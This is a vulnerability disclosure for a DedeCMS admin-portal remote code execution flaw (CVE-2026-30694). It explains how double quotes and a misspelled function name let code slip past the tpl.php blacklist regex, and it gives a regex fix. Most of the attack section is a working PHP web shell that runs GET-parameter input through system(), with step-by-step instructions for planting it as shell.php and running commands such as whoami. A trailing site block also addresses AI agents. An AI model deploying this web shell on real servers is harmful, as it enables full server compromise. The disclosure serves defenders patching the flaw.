# CVE-2026-30694 dedecms admin portal file manage getshell via bypass blacklist

## Download source code

<https://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7.118-UTF8.zip>

***

## admin portal RCE - Bypassing the blacklist regular expression flaw (verified)

* Location: `/dede/tpl.php` (file manage function)
* Risk Level: High (Requires DedeCMS administrator privileges; full RCE can be achieved)
* Exploitability: Confirmed to be exploitable
* Prerequisites: Requires administrator privileges
* Affected Scope: <=V5.7 118 UTF-8 versions

## Vulnerablitity Discover

Regular expression analysis revealed two key flaws in the DedeCMS blacklist detection regular expressions:

Defect 1: Spelling error

```php
//Source code /dede/tpl.php line 35
'array_filert'  // wrong spell, it shoule be array_filter
```

Defect 2: Incomplete character class at the end of the regular expression

```php
// regular expression (Source code /dede/tpl.php line 38):
preg_match("#[^a-z]+['\"]*{$value}['\"]*[\s]*[([{']#i", $content)
//                                           ^^^^^^
//                                           Character: ( [ { '
//                                           ❌ it lacks double quote " !
```

### Detailed Explanation of the Bypass Principle

The regular expression ending with `[([{']` only matches: `( [ { '`. It does not match: `" (double quotes)`.

Therefore, when the callback name is enclosed in double quotes, the regular expression cannot detect it.

**Example:**

&#x20;Content written to a PHP file: `array_filter(["id"],"system")` → Because the callback "system" contains double quotes, and the ending character class does not contain double quotes, the regular expression cannot match it, thus bypassing the detection.

**Python POC for regular expression**

```python
import re
#  Regular Expression check
pattern = r'[^a-z]+[\'\"]*system[\'\"]*\s*[([{\']'

# test
print(re.search(pattern, '}"system"', re.I))   # None (绕过!)
```

**Full payload**

```php
// Bypassing blacklists using array_filter + double-quoted
<?php
$g = "_GET";
$c = "c";
array_filter([${$g}[$c]],"system");
```

## Step

{% stepper %}
{% step %}
log on admin portal
{% endstep %}

{% step %}
Go to Core Module → Attachment Management → File Manager
{% endstep %}

{% step %}
Create a new file (e.g., shell.php), insert the following content, and save it:

{% code title="shell.php" %}

```php
<?php
$g = "_GET";
$c = "c";
array_filter([${$g}[$c]],"system");
```

{% endcode %}
{% endstep %}

{% step %}
Save the file (It would bypass blacklist )
{% endstep %}

{% step %}
Accessing the PHP file and passing in parameters, such as ?c=whoami, successfully obtained a shell.
{% endstep %}
{% endstepper %}

## Relavant Screenshots

&#x20;&#x20;

<figure><img src="https://1295263983-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXUOFCEN0tl3fHxKrtZ1f%2Fuploads%2F5w9vjvHUudMpX1pF6kOS%2Fimage-20260130180021054.png?alt=media&#x26;token=89441114-2a45-47a1-891e-ab1fcbee89fe" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1295263983-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXUOFCEN0tl3fHxKrtZ1f%2Fuploads%2FoilYptRQJCY2N4VnGWU8%2Fimage-20260130180114819.png?alt=media&#x26;token=f2b3059d-8d11-4e83-87cc-497fa5d32479" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1295263983-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXUOFCEN0tl3fHxKrtZ1f%2Fuploads%2FcgxtZR3OlQKfK9aA6WAC%2Fimage-20260130180218293.png?alt=media&#x26;token=3e054a7d-fc67-4bdc-984a-3fffb10e7a0c" alt=""><figcaption></figcaption></figure>

### Source Code fix recommandation

It is recommended to fix the following two issues in the source code:&#x20;

In dede/tpl.php, on line 38, fix the regular expression by adding " to the end of the character class:

```php
preg_match("#[^a-z]+['\"]*{$value}['\"]*[\s]*[([{'\"]#i", $content)
```

2. In dede/tpl.php, on line 35, fix the spelling error:

```php
// Origin: array_filert
// should be:
array_filter
```

***

<https://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7.118-UTF8.zip>

***

***


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://jacobjacobjacob.gitbook.io/cve-2026-30694/cve-2026-30694-dedecms-admin-portal-file-manage-getshell-via-bypass-blacklist.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.